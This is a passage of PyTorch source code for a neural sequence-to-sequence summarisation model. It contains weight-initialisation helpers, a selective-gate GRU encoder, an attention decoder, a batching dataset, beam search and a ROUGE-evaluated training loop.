Variable):\n constant(tensor.data, val)\n return tensor\n\n return tensor.fill_(val)\n\n\ndef eye(tensor):\n \"\"\"Fills the 
2-dimensional input Tensor or Variable with the identity matrix. Preserves the identity of the inputs\n in Linear layers, where as many inputs are preserved as possible.\n\n Args:\n tensor: a 2-dimensional torch.Tensor or autograd.Variable\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.eye(w)\n \"\"\"\n if tensor.ndimension() != 2:\n raise ValueError(\"Only tensors with 2 dimensions are supported\")\n\n if isinstance(tensor, Variable):\n eye(tensor.data)\n return tensor\n\n return tensor.copy_(torch.eye(tensor.size(0), tensor.size(1)))\n\n\ndef dirac(tensor):\n \"\"\"Fills the {3, 4, 5}-dimensional input Tensor or Variable with the Dirac delta function. Preserves the identity of\n the inputs in Convolutional layers, where as many input channels are preserved as possible.\n\n Args:\n tensor: a {3, 4, 5}-dimensional torch.Tensor or autograd.Variable\n\n Examples:\n >>> w = torch.Tensor(3, 16, 5, 5)\n >>> nn.init.dirac(w)\n \"\"\"\n dimensions = tensor.ndimension()\n if dimensions not in [3, 4, 5]:\n raise ValueError(\"Only tensors with 3, 4, or 5 dimensions are supported\")\n\n if isinstance(tensor, Variable):\n dirac(tensor.data)\n return tensor\n\n sizes = tensor.size()\n min_dim = min(sizes[0], sizes[1])\n tensor.zero_()\n\n for d in range(min_dim):\n if dimensions == 3: # Temporal convolution\n tensor[d, d, tensor.size(2) // 2] = 1\n elif dimensions == 4: # Spatial convolution\n tensor[d, d, tensor.size(2) // 2, tensor.size(3) // 2] = 1\n else: # Volumetric convolution\n tensor[d, d, tensor.size(2) // 2, tensor.size(3) // 2, tensor.size(4) // 2] = 1\n return tensor\n\n\ndef _calculate_fan_in_and_fan_out(tensor):\n dimensions = tensor.ndimension()\n if dimensions < 2:\n raise ValueError(\"Fan in and fan out can not be computed for tensor with less than 2 dimensions\")\n\n if dimensions == 2: # Linear\n fan_in = tensor.size(1)\n fan_out = tensor.size(0)\n else:\n num_input_fmaps = tensor.size(1)\n num_output_fmaps = tensor.size(0)\n receptive_field_size = 1\n if tensor.dim() > 2:\n receptive_field_size = tensor[0][0].numel()\n fan_in = num_input_fmaps * receptive_field_size\n fan_out = num_output_fmaps * receptive_field_size\n\n return fan_in, fan_out\n\n\ndef xavier_uniform(tensor, gain=1):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Understanding the\n difficulty of training deep feedforward neural networks\" - Glorot, X. & Bengio, Y. (2010), using a uniform\n distribution. The resulting tensor will have values sampled from :math:`U(-a, a)` where\n :math:`a = gain \\\\times \\sqrt{2 / (fan\\_in + fan\\_out)} \\\\times \\sqrt{3}`. Also known as Glorot initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n gain: an optional scaling factor\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.xavier_uniform(w, gain=nn.init.calculate_gain('relu'))\n \"\"\"\n if isinstance(tensor, Variable):\n xavier_uniform(tensor.data, gain=gain)\n return tensor\n\n fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)\n std = gain * math.sqrt(2.0 / (fan_in + fan_out))\n a = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation\n return tensor.uniform_(-a, a)\n\n\ndef xavier_normal(tensor, gain=1):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Understanding the\n difficulty of training deep feedforward neural networks\" - Glorot, X. & Bengio, Y. (2010), using a normal\n distribution. 
The resulting tensor will have values sampled from :math:`N(0, std)` where\n :math:`std = gain \\\\times \\sqrt{2 / (fan\\_in + fan\\_out)}`. Also known as Glorot initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n gain: an optional scaling factor\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.xavier_normal(w)\n \"\"\"\n if isinstance(tensor, Variable):\n xavier_normal(tensor.data, gain=gain)\n return tensor\n\n fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)\n std = gain * math.sqrt(2.0 / (fan_in + fan_out))\n return tensor.normal_(0, std)\n\n\ndef _calculate_correct_fan(tensor, mode):\n mode = mode.lower()\n valid_modes = ['fan_in', 'fan_out']\n if mode not in valid_modes:\n raise ValueError(\"Mode {} not supported, please use one of {}\".format(mode, valid_modes))\n\n fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)\n return fan_in if mode == 'fan_in' else fan_out\n\n\ndef kaiming_uniform(tensor, a=0, mode='fan_in'):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Delving deep into\n rectifiers: Surpassing human-level performance on ImageNet classification\" - He, K. et al. (2015), using a uniform\n distribution. The resulting tensor will have values sampled from :math:`U(-bound, bound)` where\n :math:`bound = \\sqrt{2 / ((1 + a^2) \\\\times fan\\_in)} \\\\times \\sqrt{3}`. Also known as He initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n a: the negative slope of the rectifier used after this layer (0 for ReLU by default)\n mode: either 'fan_in' (default) or 'fan_out'. Choosing `fan_in` preserves the magnitude of the variance of the\n weights in the forward pass. Choosing `fan_out` preserves the magnitudes in the backwards pass.\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.kaiming_uniform(w, mode='fan_in')\n \"\"\"\n if isinstance(tensor, Variable):\n kaiming_uniform(tensor.data, a=a, mode=mode)\n return tensor\n\n fan = _calculate_correct_fan(tensor, mode)\n gain = calculate_gain('leaky_relu', a)\n std = gain / math.sqrt(fan)\n bound = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation\n return tensor.uniform_(-bound, bound)\n\n\ndef kaiming_normal(tensor, a=0, mode='fan_in'):\n \"\"\"Fills the input Tensor or Variable with values according to the method described in \"Delving deep into\n rectifiers: Surpassing human-level performance on ImageNet classification\" - He, K. et al. (2015), using a normal\n distribution. The resulting tensor will have values sampled from :math:`N(0, std)` where\n :math:`std = \\sqrt{2 / ((1 + a^2) \\\\times fan\\_in)}`. Also known as He initialisation.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n a: the negative slope of the rectifier used after this layer (0 for ReLU by default)\n mode: either 'fan_in' (default) or 'fan_out'. Choosing `fan_in` preserves the magnitude of the variance of the\n weights in the forward pass. 
Choosing `fan_out` preserves the magnitudes in the backwards pass.\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.kaiming_normal(w, mode='fan_out')\n \"\"\"\n if isinstance(tensor, Variable):\n kaiming_normal(tensor.data, a=a, mode=mode)\n return tensor\n\n fan = _calculate_correct_fan(tensor, mode)\n gain = calculate_gain('leaky_relu', a)\n std = gain / math.sqrt(fan)\n return tensor.normal_(0, std)\n\n\ndef orthogonal(tensor, gain=1):\n \"\"\"Fills the input Tensor or Variable with a (semi) orthogonal matrix, as described in \"Exact solutions to the\n nonlinear dynamics of learning in deep linear neural networks\" - Saxe, A. et al. (2013). The input tensor must have\n at least 2 dimensions, and for tensors with more than 2 dimensions the trailing dimensions are flattened.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable, where n >= 2\n gain: optional scaling factor\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.orthogonal(w)\n \"\"\"\n if isinstance(tensor, Variable):\n orthogonal(tensor.data, gain=gain)\n return tensor\n\n if tensor.ndimension() < 2:\n raise ValueError(\"Only tensors with 2 or more dimensions are supported\")\n\n rows = tensor.size(0)\n cols = tensor[0].numel()\n flattened = torch.Tensor(rows, cols).normal_(0, 1)\n # Compute the qr factorization\n q, r = torch.qr(flattened)\n # Make Q uniform according to https://arxiv.org/pdf/math-ph/0609050.pdf\n d = torch.diag(r, 0)\n ph = d.sign()\n q *= ph.expand_as(q)\n # Pad zeros to Q (if rows smaller than cols)\n if rows < cols:\n padding = torch.zeros(rows, cols - rows)\n if q.is_cuda:\n q = torch.cat([q, padding.cuda()], 1)\n else:\n q = torch.cat([q, padding], 1)\n\n tensor.view_as(q).copy_(q)\n tensor.mul_(gain)\n return tensor\n\n\ndef sparse(tensor, sparsity, std=0.01):\n \"\"\"Fills the 2D input Tensor or Variable as a sparse matrix, where the non-zero elements will be drawn from\n the normal distribution :math:`N(0, 0.01)`, as described in \"Deep learning via\n Hessian-free optimization\" - Martens, J. 
(2010).\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n sparsity: The fraction of elements in each column to be set to zero\n std: the standard deviation of the normal distribution used to generate the non-zero values\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.sparse(w, sparsity=0.1)\n \"\"\"\n if isinstance(tensor, Variable):\n sparse(tensor.data, sparsity, std=std)\n return tensor\n\n if tensor.ndimension() != 2:\n raise ValueError(\"Only tensors with 2 dimensions are supported\")\n\n tensor.normal_(0, std)\n rows, cols = tensor.size(0), tensor.size(1)\n num_zeros = int(math.ceil(cols * sparsity))\n\n for col_idx in range(tensor.size(1)):\n row_indices = list(range(rows))\n random.shuffle(row_indices)\n zero_indices = row_indices[:num_zeros]\n for row_idx in zero_indices:\n tensor[row_idx, col_idx] = 0\n\n return tensor\n\n\ndef NMTCriterion(vocabSize):\n weight = torch.ones(vocabSize)\n weight[PAD] = 0\n crit = nn.NLLLoss(weight, size_average=False)\n if opt.gpus:\n crit.cuda()\n return crit\n\n\ndef loss_function(g_outputs, g_targets, generator, crit, eval=False):\n g_out_t = g_outputs.view(-1, g_outputs.size(2))\n g_prob_t = generator(g_out_t)\n\n g_loss = crit(g_prob_t, g_targets.view(-1))\n total_loss = g_loss\n report_loss = total_loss.data[0]\n return total_loss, report_loss, 0\n\n\ndef addPair(f1, f2):\n for x, y1 in zip(f1, f2):\n yield (x, y1)\n yield (None, None)\n\n\ndef load_dev_data(translator, src_file, tgt_file):\n dataset, raw = [], []\n srcF = open(src_file, encoding='utf-8')\n tgtF = open(tgt_file, encoding='utf-8')\n src_batch, tgt_batch = [], []\n for line, tgt in addPair(srcF, tgtF):\n if (line is not None) and (tgt is not None):\n src_tokens = line.strip().split(' ')\n src_batch += [src_tokens]\n tgt_tokens = tgt.strip().split(' ')\n tgt_batch += [tgt_tokens]\n\n if len(src_batch) < opt.batch_size:\n continue\n else:\n # at the end of file, check last batch\n if len(src_batch) == 0:\n break\n data = translator.buildData(src_batch, tgt_batch)\n dataset.append(data)\n raw.append((src_batch, tgt_batch))\n src_batch, tgt_batch = [], []\n srcF.close()\n tgtF.close()\n return (dataset, raw)\n\n\nevalModelCount = 0\ntotalBatchCount = 0\nrouge_calculator = Rouge()\n\n\ndef evalModel(model, translator, evalData):\n global evalModelCount\n global rouge_calculator\n evalModelCount += 1\n ofn = 'dev.out.{0}'.format(evalModelCount)\n if opt.save_path:\n ofn = os.path.join(opt.save_path, ofn)\n predict, gold = [], []\n processed_data, raw_data = evalData\n for batch, raw_batch in zip(processed_data, raw_data):\n # (wrap(srcBatch), lengths), (wrap(tgtBatch), ), indices\n src, tgt, indices = batch[0]\n src_batch, tgt_batch = raw_batch\n\n # (2) translate\n pred, predScore, attn, _ = translator.translateBatch(src, tgt)\n pred, predScore, attn = list(zip(\n *sorted(zip(pred, predScore, attn, indices),\n key=lambda x: x[-1])))[:-1]\n\n # (3) convert indexes to words\n predBatch = []\n for b in range(src[0].size(1)):\n n = 0\n predBatch.append(\n translator.buildTargetTokens(pred[b][n], src_batch[b], attn[b][n])\n )\n gold += [' '.join(r) for r in tgt_batch]\n predict += [' '.join(sents) for sents in predBatch]\n scores = rouge_calculator.compute_rouge(gold, predict)\n with open(ofn, 'w', encoding='utf-8') as of:\n for p in predict:\n of.write(p + '\\n')\n return scores['rouge-2']['f'][0]\n\n\ndef trainModel(model, translator, trainData, validData, dataset, optim):\n logger.info(model)\n model.train()\n logger.warning(\"Set model to {0} 
mode\".format('train' if model.decoder.dropout.training else 'eval'))\n\n # define criterion of each GPU\n criterion = NMTCriterion(dataset['dicts']['tgt'].size())\n\n start_time = time.time()\n\n def saveModel(metric=None):\n model_state_dict = model.module.state_dict() if len(opt.gpus) > 1 else model.state_dict()\n model_state_dict = {k: v for k, v in model_state_dict.items() if 'generator' not in k}\n generator_state_dict = model.generator.module.state_dict() if len(\n opt.gpus) > 1 else model.generator.state_dict()\n # (4) drop a checkpoint\n checkpoint = {\n 'model': model_state_dict,\n 'generator': generator_state_dict,\n 'dicts': dataset['dicts'],\n 'opt': opt,\n 'epoch': epoch,\n 'optim': optim\n }\n save_model_path = 'model'\n if opt.save_path:\n if not os.path.exists(opt.save_path):\n os.makedirs(opt.save_path)\n save_model_path = opt.save_path + os.path.sep + save_model_path\n if metric is not None:\n torch.save(checkpoint, '{0}_devRouge_{1}_e{2}.pt'.format(save_model_path, round(metric, 4), epoch))\n else:\n torch.save(checkpoint, '{0}_e{1}.pt'.format(save_model_path, epoch))\n\n def trainEpoch(epoch):\n\n if opt.extra_shuffle and epoch > opt.curriculum:\n logger.info('Shuffling...')\n trainData.shuffle()\n\n # shuffle mini batch order\n batchOrder = torch.randperm(len(trainData))\n\n total_loss, total_words, total_num_correct = 0, 0, 0\n report_loss, report_tgt_words, report_src_words, report_num_correct = 0, 0, 0, 0\n start = time.time()\n for i in range(len(trainData)):\n global totalBatchCount\n totalBatchCount += 1\n # (wrap(srcBatch), lengths), (wrap(tgtBatch)), indices\n batchIdx = batchOrder[i] if epoch > opt.curriculum else i\n batch = trainData[batchIdx][:-1] # exclude original indices\n\n model.zero_grad()\n g_outputs = model(batch)\n targets = batch[1][0][1:] # exclude from targets\n loss, res_loss, num_correct = loss_function(g_outputs, targets, model.generator, criterion)\n\n # update the parameters\n loss.backward()\n optim.step()\n\n num_words = targets.data.ne(PAD).sum()\n report_loss += res_loss\n report_num_correct += num_correct\n report_tgt_words += num_words\n report_src_words += batch[0][-1].data.sum()\n total_loss += res_loss\n total_num_correct += num_correct\n total_words += num_words\n if i % opt.log_interval == -1 % opt.log_interval:\n logger.info(\n \"Epoch %2d, %6d/%5d/%5d; acc: %6.2f; loss: %6.2f; words: %5d; ppl: %6.2f; %3.0f src tok/s; %3.0f tgt tok/s; %6.0f s elapsed\" %\n (epoch, totalBatchCount, i + 1, len(trainData),\n report_num_correct / report_tgt_words * 100,\n report_loss,\n report_tgt_words,\n math.exp(report_loss / report_tgt_words),\n report_src_words / (time.time() - start),\n report_tgt_words / (time.time() - start),\n time.time() - start))\n\n report_loss = report_tgt_words = report_src_words = report_num_correct = 0\n start = time.time()\n\n if validData is not None and totalBatchCount % opt.eval_per_batch == -1 % opt.eval_per_batch \\\n and totalBatchCount >= opt.start_eval_batch:\n model.eval()\n logger.warning(\"Set model to {0} mode\".format('train' if model.decoder.dropout.training else 'eval'))\n valid_bleu = evalModel(model, translator, validData)\n model.train()\n logger.warning(\"Set model to {0} mode\".format('train' if model.decoder.dropout.training else 'eval'))\n model.decoder.attn.mask = None\n logger.info('Validation Score: %g' % (valid_bleu * 100))\n if valid_bleu >= optim.best_metric:\n saveModel(valid_bleu)\n optim.updateLearningRate(valid_bleu, epoch)\n\n return total_loss / total_words, total_num_correct / 
total_words\n\n for epoch in range(opt.start_epoch, opt.epochs + 1):\n logger.info('')\n global eeee\n eeee = epoch\n # (1) train for one epoch on the training set\n train_loss, train_acc = trainEpoch(epoch)\n train_ppl = math.exp(min(train_loss, 100))\n logger.info('Train perplexity: %g' % train_ppl)\n logger.info('Train accuracy: %g' % (train_acc * 100))\n logger.info('Saving checkpoint for epoch {0}...'.format(epoch))\n saveModel()\n\n\nclass Encoder(nn.Module):\n def __init__(self, opt, dicts):\n self.layers = opt.layers\n self.num_directions = 2\n assert opt.enc_rnn_size % self.num_directions == 0\n self.hidden_size = opt.enc_rnn_size // self.num_directions\n input_size = opt.word_vec_size\n\n super(Encoder, self).__init__()\n self.word_lut = nn.Embedding(dicts.size(),\n opt.word_vec_size,\n padding_idx=PAD)\n self.rnn = nn.GRU(input_size, self.hidden_size,\n num_layers=opt.layers,\n dropout=opt.dropout,\n bidirectional=True)\n self.selective_gate = nn.Linear(self.hidden_size * 2 * 2, self.hidden_size * 2)\n self.sigmoid = nn.Sigmoid()\n\n def load_pretrained_vectors(self, opt):\n if opt.pre_word_vecs_enc is not None:\n pretrained = torch.load(opt.pre_word_vecs_enc)\n self.word_lut.weight.data.copy_(pretrained)\n\n def forward(self, input, hidden=None):\n \"\"\"\n input: (wrap(srcBatch), wrap(srcBioBatch), lengths)\n \"\"\"\n lengths = input[-1].data.view(-1).tolist() # lengths data is wrapped inside a Variable\n wordEmb = self.word_lut(input[0])\n emb = pack(wordEmb, lengths)\n outputs, hidden_t = self.rnn(emb, hidden)\n if isinstance(input, tuple):\n outputs = unpack(outputs)[0]\n forward_last = hidden_t[0]\n backward_last = hidden_t[1]\n time_step = outputs.size(0)\n batch_size = outputs.size(1)\n sentence_vector = torch.cat((forward_last, backward_last), dim=1)\n exp_buf = torch.cat((outputs, sentence_vector.unsqueeze(0).expand_as(outputs)), dim=2)\n selective_value = self.sigmoid(self.selective_gate(exp_buf.view(-1, exp_buf.size(2))))\n selective_value = selective_value.view(time_step, batch_size, -1)\n outputs = outputs * selective_value\n return hidden_t, outputs\n\n\nclass StackedGRU(nn.Module):\n def __init__(self, num_layers, input_size, rnn_size, dropout):\n super(StackedGRU, self).__init__()\n self.dropout = nn.Dropout(dropout)\n self.num_layers = num_layers\n self.layers = nn.ModuleList()\n\n for i in range(num_layers):\n self.layers.append(nn.GRUCell(input_size, rnn_size))\n input_size = rnn_size\n\n def forward(self, input, hidden):\n h_0 = hidden\n h_1 = []\n for i, layer in enumerate(self.layers):\n h_1_i = layer(input, h_0[i])\n input = h_1_i\n if i + 1 != self.num_layers:\n input = self.dropout(input)\n h_1 += [h_1_i]\n\n h_1 = torch.stack(h_1)\n\n return input, h_1\n\n\nclass MaxOut(nn.Module):\n def __init__(self, pool_size):\n super(MaxOut, self).__init__()\n self.pool_size = pool_size\n\n def forward(self, input):\n \"\"\"\n input:\n reduce_size:\n \"\"\"\n input_size = list(input.size())\n assert input_size[-1] % self.pool_size == 0\n output_size = [d for d in input_size]\n output_size[-1] = output_size[-1] // self.pool_size\n output_size.append(self.pool_size)\n last_dim = len(output_size) - 1\n input = input.view(*output_size)\n input, idx = input.max(last_dim, keepdim=True)\n output = input.squeeze(last_dim)\n\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + '({0})'.format(self.pool_size)\n\n\nclass ConcatAttention(nn.Module):\n def __init__(self, attend_dim, query_dim, att_dim):\n super(ConcatAttention, self).__init__()\n 
self.attend_dim = attend_dim\n self.query_dim = query_dim\n self.att_dim = att_dim\n self.linear_pre = nn.Linear(attend_dim, att_dim, bias=True)\n self.linear_q = nn.Linear(query_dim, att_dim, bias=False)\n self.linear_v = nn.Linear(att_dim, 1, bias=False)\n self.sm = nn.Softmax()\n self.tanh = nn.Tanh()\n self.mask = None\n\n def applyMask(self, mask):\n self.mask = mask\n\n def forward(self, input, context, precompute=None):\n \"\"\"\n input: batch x dim\n context: batch x sourceL x dim\n \"\"\"\n if precompute is None:\n precompute00 = self.linear_pre(context.contiguous().view(-1, context.size(2)))\n precompute = precompute00.view(context.size(0), context.size(1), -1) # batch x sourceL x att_dim\n targetT = self.linear_q(input).unsqueeze(1) # batch x 1 x att_dim\n\n tmp10 = precompute + targetT.expand_as(precompute) # batch x sourceL x att_dim\n tmp20 = self.tanh(tmp10) # batch x sourceL x att_dim\n energy = self.linear_v(tmp20.view(-1, tmp20.size(2))).view(tmp20.size(0), tmp20.size(1)) # batch x sourceL\n if self.mask is not None:\n # energy.data.masked_fill_(self.mask, -float('inf'))\n # energy.masked_fill_(self.mask, -float('inf')) # TODO: might be wrong\n energy = energy * (1 - self.mask) + self.mask * (-1000000)\n score = self.sm(energy)\n score_m = score.view(score.size(0), 1, score.size(1)) # batch x 1 x sourceL\n\n weightedContext = torch.bmm(score_m, context).squeeze(1) # batch x dim\n\n return weightedContext, score, precompute\n\n def __repr__(self):\n return self.__class__.__name__ + '(' + str(self.att_dim) + ' * ' + '(' \\\n + str(self.attend_dim) + '->' + str(self.att_dim) + ' + ' \\\n + str(self.query_dim) + '->' + str(self.att_dim) + ')' + ')'\n\n\nclass Decoder(nn.Module):\n def __init__(self, opt, dicts):\n self.opt = opt\n self.layers = opt.layers\n self.input_feed = opt.input_feed\n input_size = opt.word_vec_size\n if self.input_feed:\n input_size += opt.enc_rnn_size\n\n super(Decoder, self).__init__()\n self.word_lut = nn.Embedding(dicts.size(),\n opt.word_vec_size,\n padding_idx=PAD)\n self.rnn = StackedGRU(opt.layers, input_size, opt.dec_rnn_size, opt.dropout)\n self.attn = ConcatAttention(opt.enc_rnn_size, opt.dec_rnn_size, opt.att_vec_size)\n self.dropout = nn.Dropout(opt.dropout)\n self.readout = nn.Linear((opt.enc_rnn_size + opt.dec_rnn_size + opt.word_vec_size), opt.dec_rnn_size)\n self.maxout = MaxOut(opt.maxout_pool_size)\n self.maxout_pool_size = opt.maxout_pool_size\n\n self.hidden_size = opt.dec_rnn_size\n\n def load_pretrained_vectors(self, opt):\n if opt.pre_word_vecs_dec is not None:\n pretrained = torch.load(opt.pre_word_vecs_dec)\n self.word_lut.weight.data.copy_(pretrained)\n\n def forward(self, input, hidden, context, src_pad_mask, init_att):\n emb = self.word_lut(input)\n\n g_outputs = []\n cur_context = init_att\n self.attn.applyMask(src_pad_mask)\n precompute = None\n for emb_t in emb.split(1):\n emb_t = emb_t.squeeze(0)\n input_emb = emb_t\n if self.input_feed:\n input_emb = torch.cat([emb_t, cur_context], 1)\n output, hidden = self.rnn(input_emb, hidden)\n cur_context, attn, precompute = self.attn(output, context.transpose(0, 1), precompute)\n\n readout = self.readout(torch.cat((emb_t, output, cur_context), dim=1))\n maxout = self.maxout(readout)\n output = self.dropout(maxout)\n g_outputs += [output]\n g_outputs = torch.stack(g_outputs)\n return g_outputs, hidden, attn, cur_context\n\n\nclass DecInit(nn.Module):\n def __init__(self, opt):\n super(DecInit, self).__init__()\n self.num_directions = 2 if opt.brnn else 1\n assert opt.enc_rnn_size 
% self.num_directions == 0\n self.enc_rnn_size = opt.enc_rnn_size\n self.dec_rnn_size = opt.dec_rnn_size\n self.initer = nn.Linear(self.enc_rnn_size // self.num_directions, self.dec_rnn_size)\n self.tanh = nn.Tanh()\n\n def forward(self, last_enc_h):\n # batchSize = last_enc_h.size(0)\n # dim = last_enc_h.size(1)\n return self.tanh(self.initer(last_enc_h))\n\n\nclass NMTModel(nn.Module):\n def __init__(self, encoder, decoder, decIniter):\n super(NMTModel, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n self.decIniter = decIniter\n\n def make_init_att(self, context):\n batch_size = context.size(1)\n h_size = (batch_size, self.encoder.hidden_size * self.encoder.num_directions)\n return Variable(context.data.new(*h_size).zero_(), requires_grad=False)\n\n def forward(self, input):\n \"\"\"\n input: (wrap(srcBatch), wrap(srcBioBatch), lengths), (wrap(tgtBatch), wrap(copySwitchBatch), wrap(copyTgtBatch))\n \"\"\"\n # ipdb.set_trace()\n src = input[0]\n tgt = input[1][0][:-1] # exclude last target from inputs\n src_pad_mask = Variable(src[0].data.eq(PAD).transpose(0, 1).float(), requires_grad=False,\n volatile=False)\n enc_hidden, context = self.encoder(src)\n\n init_att = self.make_init_att(context)\n enc_hidden = self.decIniter(enc_hidden[1]).unsqueeze(0) # [1] is the last backward hidden\n\n g_out, dec_hidden, _attn, _attention_vector = self.decoder(tgt, enc_hidden, context, src_pad_mask, init_att)\n\n return g_out\n\n\nclass Dataset(object):\n def __init__(self, srcData, tgtData, batchSize, cuda, volatile=False):\n self.src = srcData\n if tgtData:\n self.tgt = tgtData\n assert (len(self.src) == len(self.tgt))\n else:\n self.tgt = None\n self.cuda = cuda\n\n self.batchSize = batchSize\n self.numBatches = math.ceil(len(self.src) / batchSize)\n self.volatile = volatile\n\n def _batchify(self, data, align_right=False, include_lengths=False):\n lengths = [x.size(0) for x in data]\n max_length = max(lengths)\n out = data[0].new(len(data), max_length).fill_(PAD)\n for i in range(len(data)):\n data_length = data[i].size(0)\n offset = max_length - data_length if align_right else 0\n out[i].narrow(0, offset, data_length).copy_(data[i])\n\n if include_lengths:\n return out, lengths\n else:\n return out\n\n def __getitem__(self, index):\n assert index < self.numBatches, \"%d > %d\" % (index, self.numBatches)\n srcBatch, lengths = self._batchify(\n self.src[index * self.batchSize:(index + 1) * self.batchSize],\n align_right=False, include_lengths=True)\n\n if self.tgt:\n tgtBatch = self._batchify(\n self.tgt[index * self.batchSize:(index + 1) * self.batchSize])\n else:\n tgtBatch = None\n\n # within batch sorting by decreasing length for variable length rnns\n indices = range(len(srcBatch))\n if tgtBatch is None:\n batch = zip(indices, srcBatch)\n else:\n batch = zip(indices, srcBatch, tgtBatch)\n # batch = zip(indices, srcBatch) if tgtBatch is None else zip(indices, srcBatch, tgtBatch)\n batch, lengths = zip(*sorted(zip(batch, lengths), key=lambda x: -x[1]))\n if tgtBatch is None:\n indices, srcBatch = zip(*batch)\n else:\n indices, srcBatch, tgtBatch = zip(*batch)\n\n def wrap(b):\n if b is None:\n return b\n b = torch.stack(b, 0).t().contiguous()\n if self.cuda:\n b = b.cuda()\n b = Variable(b, volatile=self.volatile)\n return b\n\n # wrap lengths in a Variable to properly split it in DataParallel\n lengths = torch.LongTensor(lengths).view(1, -1)\n lengths = Variable(lengths, volatile=self.volatile)\n\n return (wrap(srcBatch), lengths), (wrap(tgtBatch),), indices\n\n def 
__len__(self):\n return self.numBatches\n\n def shuffle(self):\n data = list(zip(self.src, self.tgt))\n self.src, self.tgt = zip(*[data[i] for i in torch.randperm(len(data))])\n\n\nclass Beam(object):\n def __init__(self, size, cuda=False):\n\n self.size = size\n self.done = False\n\n self.tt = torch.cuda if cuda else torch\n\n # The score for each translation on the beam.\n self.scores = self.tt.FloatTensor(size).zero_()\n self.all_scores = []\n self.all_length = []\n\n # The backpointers at each time-step.\n self.prevKs = []\n\n # The outputs at each time-step.\n self.nextYs = [self.tt.LongTensor(size).fill_(PAD)]\n self.nextYs[0][0] = BOS\n\n # The attentions (matrix) for each time.\n self.attn = []\n\n # Get the outputs for the current timestep.\n def getCurrentState(self):\n return self.nextYs[-1]\n\n # Get the backpointers for the current timestep.\n def getCurrentOrigin(self):\n return self.prevKs[-1]\n\n # Given prob over words for every last beam `wordLk` and attention\n # `attnOut`: Compute and update the beam search.\n #\n # Parameters:\n #\n # * `wordLk`- probs of advancing from the last step (K x words)\n # * `attnOut`- attention at the last step\n #\n # Returns: True if beam search is complete.\n def advance(self, wordLk, attnOut):\n numWords = wordLk.size(1)\n\n # self.length += 1 # TODO: some is finished so do not acc length for them\n if len(self.prevKs) > 0:\n finish_index = self.nextYs[-1].eq(EOS)\n if any(finish_index):\n wordLk.masked_fill_(finish_index.unsqueeze(1).expand_as(wordLk), -float('inf'))\n for i in range(self.size):\n if self.nextYs[-1][i] == EOS:\n wordLk[i][EOS] = 0\n # set up the current step length\n cur_length = self.all_length[-1]\n for i in range(self.size):\n cur_length[i] += 0 if self.nextYs[-1][i] == EOS else 1\n\n # Sum the previous scores.\n if len(self.prevKs) > 0:\n prev_score = self.all_scores[-1]\n now_acc_score = wordLk + prev_score.unsqueeze(1).expand_as(wordLk)\n beamLk = now_acc_score / cur_length.unsqueeze(1).expand_as(now_acc_score)\n else:\n self.all_length.append(self.tt.FloatTensor(self.size).fill_(1))\n beamLk = wordLk[0]\n\n flatBeamLk = beamLk.view(-1)\n\n bestScores, bestScoresId = flatBeamLk.topk(self.size, 0, True, True)\n self.scores = bestScores\n\n # bestScoresId is flattened beam x word array, so calculate which\n # word and beam each score came from\n prevK = bestScoresId / numWords\n predict = bestScoresId - prevK * numWords\n\n if len(self.prevKs) > 0:\n self.all_length.append(cur_length.index_select(0, prevK))\n self.all_scores.append(now_acc_score.view(-1).index_select(0, bestScoresId))\n else:\n self.all_scores.append(self.scores)\n\n self.prevKs.append(prevK)\n self.nextYs.append(predict)\n self.attn.append(attnOut.index_select(0, prevK))\n\n # End condition is when every one is EOS.\n if all(self.nextYs[-1].eq(EOS)):\n self.done = True\n\n return self.done\n\n def sortBest(self):\n return torch.sort(self.scores, 0, True)\n\n # Get the score of the best in the beam.\n def getBest(self):\n scores, ids = self.sortBest()\n return scores[1], ids[1]\n\n # Walk back to construct the full hypothesis.\n #\n # Parameters.\n #\n # * `k` - the position in the beam to construct.\n #\n # Returns.\n #\n # 1. The hypothesis\n # 2. 
The attention at each time step.\n def getHyp(self, k):\n hyp, attn = [], []\n # print(len(self.prevKs), len(self.nextYs), len(self.attn))\n for j in range(len(self.prevKs) - 1, -1, -1):\n hyp.append(self.nextYs[j + 1][k])\n attn.append(self.attn[j][k])\n k = self.prevKs[j][k]\n\n return hyp[::-1], torch.stack(attn[::-1])\n\n\nclass Translator(object):\n def __init__(self, opt, model=None, dataset=None):\n self.opt = opt\n\n if model is None:\n\n checkpoint = torch.load(opt.model)\n\n model_opt = checkpoint['opt']\n self.src_dict = checkpoint['dicts']['src']\n self.tgt_dict = checkpoint['dicts']['tgt']\n\n self.enc_rnn_size = model_opt.enc_rnn_size\n self.dec_rnn_size = model_opt.dec_rnn_size\n encoder = Encoder(model_opt, self.src_dict)\n decoder = Decoder(model_opt, self.tgt_dict)\n decIniter = DecInit(model_opt)\n model = NMTModel(encoder, decoder, decIniter)\n\n generator = nn.Sequential(\n nn.Linear(model_opt.dec_rnn_size // model_opt.maxout_pool_size, self.tgt_dict.size()),\n nn.LogSoftmax())\n\n model.load_state_dict(checkpoint['model'])\n generator.load_state_dict(checkpoint['generator'])\n\n if opt.cuda:\n model.cuda()\n generator.cuda()\n else:\n model.cpu()\n generator.cpu()\n\n model.generator = generator\n else:\n self.src_dict = dataset['dicts']['src']\n 